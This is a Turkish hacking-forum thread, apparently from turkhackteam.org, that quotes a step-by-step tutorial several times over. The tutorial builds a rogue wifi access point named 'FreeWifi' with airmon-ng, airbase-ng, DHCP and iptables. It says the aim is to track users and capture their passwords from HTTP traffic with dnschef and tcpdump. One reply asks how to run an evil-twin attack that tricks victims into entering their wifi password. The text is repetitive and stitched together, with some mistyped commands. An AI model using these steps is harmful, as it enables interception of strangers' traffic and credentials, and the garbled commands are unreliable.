Eline sağlık dostum
elinize sağlık. evil twin olarak da kullanılabilir mi? yardımcı adaptörle karşıdaki wifi kesip, aynı adda sizin yöntemle bir ağ oluştursak? ama sorun şu ki sahte arayüz kullanmak istemiyorum (modeme bağlanınca oturum aç mesajı gibi). yani önce karşı wifi kesilerek handshake yakalasak, sonra bu handshake ile ağımızı oluştursak, kurban sahte ağa bağlanmak zorunda kalacak. ve wifi bağlanmak için şifresini girecek. umarım anlatabildim. böyle bir şey yapılabilir mi hocam. toollar var ama vasat geliyor . hata veriyor vs.
Bu adımlara kadar geldikten sonra ilgili testleri yapın. Bu sayede bir kullanıcının IP'sini alıp onu izleyebilirsiniz dnschef ile dns yönlendirmesi yaparak ve tcpdump ile de http trafiğinde parola bilgilerini alabiliriz.
Elinize sağlık hocam.
Eline sağlık...........
emegine saglik tesekkurler
Elinize sağlık hocam
Elinize Sağlık
Saygısızlık etmek istemem ama çok çok daha basit ve etkili bir yöntem biliyorum.
Bize bunlarla gell
Ellerine sağlık ,
Eline Sağlık Yararlı Konu )
eline sağlık , eyw
Elinize sağlık güzel çalışma
Ellerine sağlık
Elinize sağlık hocam.
Eline sağlık üstad
Ellerine sağlık, iyi avlar :trl
Elinize sağlık hocam, yararlı konu
eline sağlık hocam
hocM
Aircrack-ng Nedir?
Aircrack-ng, bir paket dinleyici veya WEP ve WPA/WPA2 şifrelerini kıran bir dedektör diyebiliriz. Aircrack aracını kullanırken bazı öğrenmemiz gereken komutlar var. Bunlar;
"airodump-ng" , "aireplay-ng" , "aircrack-ng" ve "airdecap-ng" bugün ki konumuzda göreceğimiz komutlar.
Aircrack ile Sahte Kablosuz Ağ Oluşturma
Terminalimizi açıp ilk komudumuz ile başlayalım.
Kod:ifconfig
WLAN14 Bizim ağ adaptörümüz demektir.
Şimdi sahte erişim noktası için ağ adaptörümüzü kullanalım ve airmon-ng aracımız ile sanal bir arayüz oluşturalım ve bağlantımızı başlatalım.
Kod:airmon-ng start wlan14
Artık dinleme yapmayı veya sahte erişim noktası yapabilmek için ağ adaptörümüzu kullanabilirsiniz,
airmon-ng aracıyla sanal bir arayüz oluşturup ilgili bağlantımızı başlatalım,
mon1 adında bir arayüz oluştu test edelim bakalım etrafdaki kablosuz ağlarımız gözüküyor mu, Fakat onu yapmadan hata vermemesi için şu komutu yazalım,
Kod:modprobe r8187se
Ardından mon1 arayüzümüzü test edelim,
Kod:airodum-ng mon1
Bu ağa bağlanıcak kişilere ip verebilmek adına DHCP sunucumuzu kuruyoruz
Kod:apt-get install dhcp3-server
Yüklenmezse manuel bir şekilde indirmek için bu dosyayı indirin http://oemsources.volumio.org/brystonair/1.365/isc-dhcp-server.tar.gz
Ardından bu komudu yazalım
Kod:tar -xvf isc-dhcp-server.tar.gz -C /test
.dep paketimiz yüklendikten sonra sistemi sonra yeniden başlatalım.
Kod:dpkg -i isc.dhcp.server.dep
Kod:reboot
Sonra IP aralığını verebilmek için dhcp servisimizin conf dosyasını düzenleyelim
Kod:nano /etc/dhcp3/dhcpd.conf
ve direkt bu kısmı copy-paste yapın.
Ardından airbase-ng komuduyla kablosuz ağı oluşturalım.
Kod:airbase-ng -e FreeWifi -c 11 -v wlan1 &
at0 isimli bir sanal arabirimi indirelim,
Kod:ifconfig at0 up
Kod:ifconfig at0 10.0.0.254 netmask 255.255.255.0
route komutunu yazalım,
Kod:route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.254
iptable ayarlarımızı yapalım,
Kod:iptables --flush
Kod:iptables --table nat --flush
Kod:iptables --delete-chain
Kod:iptables -P FORWARD ACCEPT
Kod:iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
DHCP serverimizi başlatalım,
Kod:dhcpd -d -f -cf /etc/dhcp3/dhcpd.conf at0 &
geçiş yapacak IP'lerimizi yönlendirelim.
Kod:echo "1" > /proc/sys/net/ipv4/ip_forward
Bu adımlara kadar geldikten sonra ilgili testleri yapın. Bu sayede bir kullanıcının IP'sini alıp onu izleyebilirsiniz dnschef ile dns yönlendirmesi yaparak ve tcpdump ile de http trafiğinde parola bilgilerini alabiliriz.
hocam aircrack linki var mı
Aircrack-ng Nedir?
Aircrack-ng, bir paket dinleyici veya WEP ve WPA/WPA2 şifrelerini kıran bir dedektör diyebiliriz. Aircrack aracını kullanırken bazı öğrenmemiz gereken komutlar var. Bunlar;
"airodump-ng" , "aireplay-ng" , "aircrack-ng" ve "airdecap-ng" bugün ki konumuzda göreceğimiz komutlar.
Aircrack ile Sahte Kablosuz Ağ Oluşturma
Terminalimizi açıp ilk komudumuz ile başlayalım.
Kod:ifconfig
WLAN14 Bizim ağ adaptörümüz demektir.
Şimdi sahte erişim noktası için ağ adaptörümüzü kullanalım ve airmon-ng aracımız ile sanal bir arayüz oluşturalım ve bağlantımızı başlatalım.
Kod:airmon-ng start wlan14
Artık dinleme yapmayı veya sahte erişim noktası yapabilmek için ağ adaptörümüzu kullanabilirsiniz,
airmon-ng aracıyla sanal bir arayüz oluşturup ilgili bağlantımızı başlatalım,
mon1 adında bir arayüz oluştu test edelim bakalım etrafdaki kablosuz ağlarımız gözüküyor mu, Fakat onu yapmadan hata vermemesi için şu komutu yazalım,
Kod:modprobe r8187se
Ardından mon1 arayüzümüzü test edelim,
Kod:airodum-ng mon1
Bu ağa bağlanıcak kişilere ip verebilmek adına DHCP sunucumuzu kuruyoruz
Kod:apt-get install dhcp3-server
Yüklenmezse manuel bir şekilde indirmek için bu dosyayı indirin http://oemsources.volumio.org/brystonair/1.365/isc-dhcp-server.tar.gz
Ardından bu komudu yazalım
Kod:tar -xvf isc-dhcp-server.tar.gz -C /test
.dep paketimiz yüklendikten sonra sistemi sonra yeniden başlatalım.
Kod:dpkg -i isc.dhcp.server.dep
Kod:reboot
Sonra IP aralığını verebilmek için dhcp servisimizin conf dosyasını düzenleyelim
Kod:nano /etc/dhcp3/dhcpd.conf
ve direkt bu kısmı copy-paste yapın.
Ardından airbase-ng komuduyla kablosuz ağı oluşturalım.
Kod:airbase-ng -e FreeWifi -c 11 -v wlan1 &
at0 isimli bir sanal arabirimi indirelim,
Kod:ifconfig at0 up
Kod:ifconfig at0 10.0.0.254 netmask 255.255.255.0
route komutunu yazalım,
Kod:route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.254
iptable ayarlarımızı yapalım,
Kod:iptables --flush
Kod:iptables --table nat --flush
Kod:iptables --delete-chain
Kod:iptables -P FORWARD ACCEPT
Kod:iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
DHCP serverimizi başlatalım,
Kod:dhcpd -d -f -cf /etc/dhcp3/dhcpd.conf at0 &
geçiş yapacak IP'lerimizi yönlendirelim.
Kod:echo "1" > /proc/sys/net/ipv4/ip_forward
Bu adımlara kadar geldikten sonra ilgili testleri yapın. Bu sayede bir kullanıcının IP'sini alıp onu izleyebilirsiniz dnschef ile dns yönlendirmesi yaparak ve tcpdump ile de http trafiğinde parola bilgilerini alabiliriz.
Elinize sağlık, teşekkürler.elinize sağlık. evil twin olarak da kullanılabilir mi? yardımcı adaptörle karşıdaki wifi kesip, aynı adda sizin yöntemle bir ağ oluştursak? ama sorun şu ki sahte arayüz kullanmak istemiyorum (modeme bağlanınca oturum aç mesajı gibi). yani önce karşı wifi kesilerek handshake yakalasak, sonra bu handshake ile ağımızı oluştursak, kurban sahte ağa bağlanmak zorunda kalacak. ve wifi bağlanmak için şifresini girecek. umarım anlatabildim. böyle bir şey yapılabilir mi hocam. toollar var ama vasat geliyor . hata veriyor vs.
Elinize sağlık
Aircrack-ng Nedir?
Aircrack-ng, bir paket dinleyici veya WEP ve WPA/WPA2 şifrelerini kıran bir dedektör diyebiliriz. Aircrack aracını kullanırken bazı öğrenmemiz gereken komutlar var. Bunlar;
"airodump-ng" , "aireplay-ng" , "aircrack-ng" ve "airdecap-ng" bugün ki konumuzda göreceğimiz komutlar.
Aircrack ile Sahte Kablosuz Ağ Oluşturma
Terminalimizi açıp ilk komudumuz ile başlayalım.
Kod:ifconfig
WLAN14 Bizim ağ adaptörümüz demektir.
Şimdi sahte erişim noktası için ağ adaptörümüzü kullanalım ve airmon-ng aracımız ile sanal bir arayüz oluşturalım ve bağlantımızı başlatalım.
Kod:airmon-ng start wlan14
Artık dinleme yapmayı veya sahte erişim noktası yapabilmek için ağ adaptörümüzu kullanabilirsiniz,
airmon-ng aracıyla sanal bir arayüz oluşturup ilgili bağlantımızı başlatalım,
mon1 adında bir arayüz oluştu test edelim bakalım etrafdaki kablosuz ağlarımız gözüküyor mu, Fakat onu yapmadan hata vermemesi için şu komutu yazalım,
Kod:modprobe r8187se
Ardından mon1 arayüzümüzü test edelim,
Kod:airodum-ng mon1
Bu ağa bağlanıcak kişilere ip verebilmek adına DHCP sunucumuzu kuruyoruz
Kod:apt-get install dhcp3-server
Yüklenmezse manuel bir şekilde indirmek için bu dosyayı indirin http://oemsources.volumio.org/brystonair/1.365/isc-dhcp-server.tar.gz
Ardından bu komudu yazalım
Kod:tar -xvf isc-dhcp-server.tar.gz -C /test
.dep paketimiz yüklendikten sonra sistemi sonra yeniden başlatalım.
Kod:dpkg -i isc.dhcp.server.dep
Kod:reboot
Sonra IP aralığını verebilmek için dhcp servisimizin conf dosyasını düzenleyelim
Kod:nano /etc/dhcp3/dhcpd.conf
ve direkt bu kısmı copy-paste yapın.
Ardından airbase-ng komuduyla kablosuz ağı oluşturalım.
Kod:airbase-ng -e FreeWifi -c 11 -v wlan1 &
at0 isimli bir sanal arabirimi indirelim,
Kod:ifconfig at0 up
Kod:ifconfig at0 10.0.0.254 netmask 255.255.255.0
route komutunu yazalım,
Kod:route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.254
iptable ayarlarımızı yapalım,
Kod:iptables --flush
Kod:iptables --table nat --flush
Kod:iptables --delete-chain
Kod:iptables -P FORWARD ACCEPT
Kod:iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
DHCP serverimizi başlatalım,
Kod:dhcpd -d -f -cf /etc/dhcp3/dhcpd.conf at0 &
geçiş yapacak IP'lerimizi yönlendirelim.
Kod:echo "1" > /proc/sys/net/ipv4/ip_forward
Bu adımlara kadar geldikten sonra ilgili testleri yapın. Bu sayede bir kullanıcının IP'sini alıp onu izleyebilirsiniz dnschef ile dns yönlendirmesi yaparak ve tcpdump ile de http trafiğinde parola bilgilerini alabiliriz.
Aircrack-ng Nedir?
Aircrack-ng, bir paket dinleyici veya WEP ve WPA/WPA2 şifrelerini kıran bir dedektör diyebiliriz. Aircrack aracını kullanırken bazı öğrenmemiz gereken komutlar var. Bunlar;
"airodump-ng" , "aireplay-ng" , "aircrack-ng" ve "airdecap-ng" bugün ki konumuzda göreceğimiz komutlar.
Aircrack ile Sahte Kablosuz Ağ Oluşturma
Terminalimizi açıp ilk komudumuz ile başlayalım.
Kod:ifconfig
WLAN14 Bizim ağ adaptörümüz demektir.
Şimdi sahte erişim noktası için ağ adaptörümüzü kullanalım ve airmon-ng aracımız ile sanal bir arayüz oluşturalım ve bağlantımızı başlatalım.
Kod:airmon-ng start wlan14
Artık dinleme yapmayı veya sahte erişim noktası yapabilmek için ağ adaptörümüzu kullanabilirsiniz,
airmon-ng aracıyla sanal bir arayüz oluşturup ilgili bağlantımızı başlatalım,
mon1 adında bir arayüz oluştu test edelim bakalım etrafdaki kablosuz ağlarımız gözüküyor mu, Fakat onu yapmadan hata vermemesi için şu komutu yazalım,
Kod:modprobe r8187se
Ardından mon1 arayüzümüzü test edelim,
Kod:airodum-ng mon1
Bu ağa bağlanıcak kişilere ip verebilmek adına DHCP sunucumuzu kuruyoruz
Kod:apt-get install dhcp3-server
Yüklenmezse manuel bir şekilde indirmek için bu dosyayı indirin http://oemsources.volumio.org/brystonair/1.365/isc-dhcp-server.tar.gz
Ardından bu komudu yazalım
Kod:tar -xvf isc-dhcp-server.tar.gz -C /test
.dep paketimiz yüklendikten sonra sistemi sonra yeniden başlatalım.
Kod:dpkg -i isc.dhcp.server.dep
Kod:reboot
Sonra IP aralığını verebilmek için dhcp servisimizin conf dosyasını düzenleyelim
Kod:nano /etc/dhcp3/dhcpd.conf
ve direkt bu kısmı copy-paste yapın.
Ardından airbase-ng komuduyla kablosuz ağı oluşturalım.
Kod:airbase-ng -e FreeWifi -c 11 -v wlan1 &
at0 isimli bir sanal arabirimi indirelim,
Kod:ifconfig at0 up
Kod:ifconfig at0 10.0.0.254 netmask 255.255.255.0
route komutunu yazalım,
Kod:route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.254
iptable ayarlarımızı yapalım,
Kod:iptables --flush
Kod:iptables --table nat --flush
Kod:iptables --delete-chain
Kod:iptables -P FORWARD ACCEPT
Kod:iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
DHCP serverimizi başlatalım,
Kod:dhcpd -d -f -cf /etc/dhcp3/dhcpd.conf at0 &
geçiş yapacak IP'lerimizi yönlendirelim.
Kod:echo "1" > /proc/sys/net/ipv4/ip_forward
Bu adımlara kadar geldikten sonra ilgili testleri yapın. Bu sayede bir kullanıcının IP'sini alıp onu izleyebilirsiniz dnschef ile dns yönlendirmesi yaparak ve tcpdump ile de http trafiğinde parola bilgilerini alabiliriz.
Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.